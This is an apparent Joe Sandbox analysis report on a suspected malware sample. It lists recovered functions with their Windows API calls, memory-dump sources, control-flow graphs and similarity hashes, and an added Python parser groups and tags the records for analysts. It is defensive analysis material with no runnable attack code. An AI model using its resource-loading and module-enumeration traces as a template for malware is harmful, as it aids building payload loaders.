                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                              • String ID:
                                                                                              • API String ID: 920484758-0
                                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                              • Instruction ID: 7cba35b264a240d0436a116bebb789cc463737a3b39c1037891bcc72e12fd266
                                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                              • Instruction Fuzzy Hash: DF411A79A117699FCB62DB58CC90BC9B3BCAF5C601F0441D9E549AB211DB30AF81CF60
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 031CAD59
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031CAD7D
                                                                                              • GetModuleFileNameA.KERNEL32(031C0000,?,00000105), ref: 031CAD98
                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 031CAE2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              • Opcode ID: f5e17a450822226f03ff111b17d8718baa58378a040384c05db7f727e830d0b4
                                                                                              • Instruction ID: 66a50d454771a5dae31adbfc33609bf683a675aff265da17a010d07d4b312f14
                                                                                              • Opcode Fuzzy Hash: f5e17a450822226f03ff111b17d8718baa58378a040384c05db7f727e830d0b4
                                                                                              • Instruction Fuzzy Hash: 65411F74A1039C9BDB21DB68DD84BDAB7FCAF2C200F4440E9A548EB245D7749F948F94
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 031CAD59
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031CAD7D
                                                                                              • GetModuleFileNameA.KERNEL32(031C0000,?,00000105), ref: 031CAD98
                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 031CAE2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              • Opcode ID: 19d051e35025ac9efe6da69b96030b0128dae1921998d4a1a8e6a5c68a141ade
                                                                                              • Instruction ID: 9c0c071fa77b30ee2c4d0de46a24b2bffb9b5af77ecd2fe8e38113c4566a6c2a
                                                                                              • Opcode Fuzzy Hash: 19d051e35025ac9efe6da69b96030b0128dae1921998d4a1a8e6a5c68a141ade
                                                                                              • Instruction Fuzzy Hash: A5411D74A1039C9BDB21EB68DC84BDAB7FCAF2C200F4440E9A548EB245D7749F948F94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6307ee7bebd612fe02839c2aee0327e121b4aa99b8254591bdcc55d2b8492c07
                                                                                              • Instruction ID: 78741f44fc084d9953456c98ccf8394abf75bd5bbe0a59c320ca7fa56b3d574b
                                                                                              • Opcode Fuzzy Hash: 6307ee7bebd612fe02839c2aee0327e121b4aa99b8254591bdcc55d2b8492c07
                                                                                              • Instruction Fuzzy Hash: 8FA12A6A7B07802BD719EA7C9C943BDB3C19BEC221F1C427EE115CB387DB64C9558240
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,031C95DA), ref: 031C9572
                                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,031C95DA), ref: 031C9578
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DateFormatLocaleThread
                                                                                              • String ID: yyyy
                                                                                              • API String ID: 3303714858-3145165042
                                                                                              • Opcode ID: 86ee03b40dbe80eea66008a8d75616458c41e3c06d25822751eb228f025f3594
                                                                                              • Instruction ID: 7abb9fb90d6b00a26aaf70e8e5255cde4cf629833601e295746017b6f5901b53
                                                                                              • Opcode Fuzzy Hash: 86ee03b40dbe80eea66008a8d75616458c41e3c06d25822751eb228f025f3594
                                                                                              • Instruction Fuzzy Hash: 49219575A242989FCB11DFA5C991AEEB3B8EF1D700F5500AEE805EB241DB30DE40CB65
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031D83C2), ref: 031D83A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                              • String ID: FlushInstructionCache$Kernel32
                                                                                              • API String ID: 3811539418-184458249
                                                                                              • Opcode ID: 1e28e7b9384fd85676e09bbbc51ccfa62977cf80042343b07f4c7e9ae62f293d
                                                                                              • Instruction ID: 8e50328d216a961525fc3dd86171dcc3fe77241c468ad7d5433f9bd7066d6b26
                                                                                              • Opcode Fuzzy Hash: 1e28e7b9384fd85676e09bbbc51ccfa62977cf80042343b07f4c7e9ae62f293d
                                                                                              • Instruction Fuzzy Hash: 91016D79214348BFDB01EFA9EC51F9E7BACE74EA00F518060B918DA640DB70ED008625
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031DAF58
                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 031DAF88
                                                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 031DAFA7
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031DAFB3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Read$Write
                                                                                              • String ID:
                                                                                              • API String ID: 3448952669-0
                                                                                              • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                              • Instruction ID: 77b025439c8a45173ca5e82249450474a13ad6a97929debc2d59175f8711268e
                                                                                              • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                              • Instruction Fuzzy Hash: B921B4B1A40719ABDB10DF69CC80BAE73A9EF59311F044591FD149B384D734E81187A0

Execution Graph

Execution Coverage: 11.2%
Dynamic/Decrypted Code Coverage: 55.4%
Signature Coverage: 10.7%
Total number of Nodes: 401
Total number of Limit Nodes: 44

Control-flow Graph

                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                              • _getenv.LIBCMT ref: 00401ABA
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                              • Module32First.KERNEL32 ref: 00401C48
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                              • _malloc.LIBCMT ref: 00401EBA
                                                                                              • _memset.LIBCMT ref: 00401EDD
                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                              • API String ID: 1430744539-2962942730
                                                                                              • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                              • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                              • String ID:
                                                                                              • API String ID: 2598563909-0
                                                                                              • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                              • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                              • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                              • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                              • GetLastError.KERNEL32 ref: 00401940
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3322701435-0
                                                                                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
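The entries above and below are Joe Sandbox's per-function records: each lists the APIs a recovered function calls together with the call-site address (ref:), the memory dump the function was carved from (Source File / Offset / based on PE), and the API ID, API String ID and fuzzy hashes used to match the function against other samples. The report repeats a function once for every dump it was found in (the two DuplicateHandle entries further down share API String ID 3793708945-0 but carry different opcode IDs), so an analyst working through hundreds of these records usually wants them in structured form. The parser below is an added example and is not part of the Joe Sandbox report or of Joe Security's tooling; its TAGS table is a heuristic of this example's own, and its sample input is constructed text laid out like the entries on this page, with shortened hash values.

```python
"""Parse per-function entries of a Joe Sandbox text report and tag each
recovered function by the Win32 / CRT APIs it calls.

Added example for this page, not part of the Joe Sandbox report or of Joe
Security's tooling. TAGS is this example's own heuristic; SAMPLE_REPORT is
constructed text mirroring the entry format above (hashes shortened)."""
import re
from dataclasses import dataclass, field

# Heuristic API groupings (assumption: this example's own, not a Joe Sandbox
# signature set). A function gets a tag when it calls any API in the set.
TAGS = {
    "resource-payload": {"FindResourceA", "FindResourceW", "SizeofResource", "LoadResource", "LockResource"},
    "module-enumeration": {"CreateToolhelp32Snapshot", "Module32First", "Module32Next"},
    "handle-duplication": {"DuplicateHandle"},
    "window-surface": {"CreateWindowExW", "CallWindowProcW"},
    "file-deletion": {"DeleteFileA", "DeleteFileW"},
}

# Matches "• Api.MODULE(args), ref: ADDR" and the indented
# "• Part of subcall function ADDR: Api.MODULE ref: ADDR" variant.
CALL_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w@:~]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")  # "• Key: value"

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)  # (api, module, ref, via_subcall)
    offset: str = ""            # load address of the dump the function came from
    based_on_pe: bool = False   # True: dump was a mapped PE; False: raw region
    api_id: str = ""
    api_string_id: str = ""
    instruction_fuzzy: str = ""

    def tags(self):
        names = {api for api, _, _, _ in self.calls}
        return sorted(tag for tag, apis in TAGS.items() if names & apis)

def parse_entries(text):
    """Each entry ends with its 'Instruction Fuzzy Hash' line, which closes it."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        m = CALL_RE.match(line)
        if m:
            cur.calls.append((m["api"], m["module"].upper(), m["ref"].upper(),
                              m["sub"] is not None))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue                        # headings, CFG legend, blank lines
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", val)
            cur.offset = off.group(1).upper() if off else ""
            cur.based_on_pe = val.endswith("based on PE: true")
        elif key == "API ID":
            cur.api_id = val
        elif key == "API String ID":
            cur.api_string_id = val
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy = val
            entries.append(cur)
            cur = FunctionEntry()
    return entries

def group_by_api_string_id(entries):
    """The report lists a function once per dump it appears in; grouping on
    API String ID lets an analyst review each distinct function once."""
    groups = {}
    for e in entries:
        if e.api_string_id:
            groups.setdefault(e.api_string_id, []).append(e)
    return groups

# Constructed sample in the report's layout; hash values are shortened.
SAMPLE_REPORT = """\
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2DB858DF
• Source File: 00000009.00000002.1892082144.000000002DB80000.sdmp, Offset: 2DB80000, based on PE: false
• API ID: DuplicateHandle
• API String ID: 3793708945-0
• Instruction Fuzzy Hash: 0F21B2B5900259DF
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2DB858DF
• Source File: 00000009.00000002.1892082144.000000002DB80000.sdmp, Offset: 2DB80000, based on PE: false
• API String ID: 3793708945-0
• Instruction Fuzzy Hash: E521C2B59002599F
APIs
• _malloc.LIBCMT ref: 0040AF80
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001), ref: 0040B8C4
• std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
• __CxxThrowException@8.LIBCMT ref: 0040AFC5
• Source File: 00000009.00000001.1719718721.0000000000400000.sdmp, Offset: 00400000, based on PE: true
• API String ID: 1411284514-0
• Instruction Fuzzy Hash: 67F0BE21A0030662
"""

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_REPORT)
    for e in parsed:
        print(e.offset, e.api_string_id, [c[0] for c in e.calls], e.tags())
    for sid, same in group_by_api_string_id(parsed).items():
        print(f"API String ID {sid}: {len(same)} dump(s)")
```

Calls reached through "Part of subcall function" are kept but flagged, because Joe Sandbox lists them under the caller while the call site belongs to the callee; a tag derived from such a call should be read as "reachable from this function", not "performed by this function".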

                                                                                              Control-flow Graph (basic blocks and edges)
                                                                                              • 1230: 2db85610-2db8569f GetCurrentProcess
                                                                                              • 1234: 2db856a8-2db856dc GetCurrentThread
                                                                                              • 1235: 2db856a1-2db856a7
                                                                                              • 1236: 2db856de-2db856e4
                                                                                              • 1237: 2db856e5-2db85719 GetCurrentProcess
                                                                                              • 1238: 2db8571b-2db85721
                                                                                              • 1239: 2db85722-2db8573d call 2db857e0
                                                                                              • 1243: 2db85743-2db85772 GetCurrentThreadId
                                                                                              • 1244: 2db8577b-2db857dd
                                                                                              • 1245: 2db85774-2db8577a
                                                                                              • Edges: 1230->1234, 1230->1235, 1234->1236, 1234->1237, 1235->1234, 1236->1237, 1237->1238, 1237->1239, 1238->1239, 1239->1243, 1243->1244, 1243->1245, 1245->1244
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2DB8568E
                                                                                              • GetCurrentThread.KERNEL32 ref: 2DB856CB
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2DB85708
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 2DB85761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 90603652ac0461f7fbaba94812eb17fe7894eb10fb6934b9658f7b0403b322d0
                                                                                              • Instruction ID: 2adb6f33cd6a0f62172af980cc78cf9c0f302246ee7969c0c5f31c3949a7f1c6
                                                                                              • Opcode Fuzzy Hash: 90603652ac0461f7fbaba94812eb17fe7894eb10fb6934b9658f7b0403b322d0
                                                                                              • Instruction Fuzzy Hash: 395145B49006498FDB04CFA9C588BAEBBF1EF48310F20C559E419B73A1D734A985CF66

                                                                                              Control-flow Graph (basic blocks and edges)
                                                                                              • 1208: 2db8560a-2db8569f GetCurrentProcess
                                                                                              • 1212: 2db856a8-2db856dc GetCurrentThread
                                                                                              • 1213: 2db856a1-2db856a7
                                                                                              • 1214: 2db856de-2db856e4
                                                                                              • 1215: 2db856e5-2db85719 GetCurrentProcess
                                                                                              • 1216: 2db8571b-2db85721
                                                                                              • 1217: 2db85722-2db8573d call 2db857e0
                                                                                              • 1221: 2db85743-2db85772 GetCurrentThreadId
                                                                                              • 1222: 2db8577b-2db857dd
                                                                                              • 1223: 2db85774-2db8577a
                                                                                              • Edges: 1208->1212, 1208->1213, 1212->1214, 1212->1215, 1213->1212, 1214->1215, 1215->1216, 1215->1217, 1216->1217, 1217->1221, 1221->1222, 1221->1223, 1223->1222
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2DB8568E
                                                                                              • GetCurrentThread.KERNEL32 ref: 2DB856CB
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2DB85708
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 2DB85761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 38b754197ebd9daf0e8cf51295f408839562e4dab40ae0b6497fde4d3314a098
                                                                                              • Instruction ID: 8fb7bf020441906940ee7922e2126d17dc7e109299344209c5fa51598a767582
                                                                                              • Opcode Fuzzy Hash: 38b754197ebd9daf0e8cf51295f408839562e4dab40ae0b6497fde4d3314a098
                                                                                              • Instruction Fuzzy Hash: 545146B49006498FDB04CFA9C588BAEBBF1AF48310F208559E459B73A1D734A985CF66
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0040AF80
                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1411284514-0
                                                                                              • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                              • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1891215839.000000002D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2d810000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b501236782a4fc8c2260e5c6b316f271b94066372a30b91d4f25931e78e8d012
                                                                                              • Instruction ID: 1b5d4c77b0a4f9d71dc8f9f2d430b9ac6e6b6c24e2357f8ecca5e6c7cd5e3a73
                                                                                              • Opcode Fuzzy Hash: b501236782a4fc8c2260e5c6b316f271b94066372a30b91d4f25931e78e8d012
                                                                                              • Instruction Fuzzy Hash: 86410271E083958FC700CFB9D4047AEBBF1AF89310F14866AD548A7691DB789845CBE1
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2DB81A62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
